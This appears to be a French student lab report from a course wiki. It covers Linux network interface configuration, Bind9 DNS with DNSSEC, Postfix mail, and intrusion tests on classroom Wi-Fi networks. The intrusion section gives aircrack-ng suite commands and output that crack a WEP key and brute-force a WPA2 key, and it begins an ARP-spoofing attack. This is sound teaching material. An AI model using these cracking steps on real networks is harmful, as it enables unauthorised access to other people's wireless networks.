 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
On peux maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveuyrs de non configurer, on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commancer, on crée un repertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une méchagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenètre de configuration s'ouver. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on resoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoint de pouvoir recevoirr les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commance &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différante care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyet le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|200px|thumb|left|texte descriptif]]&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
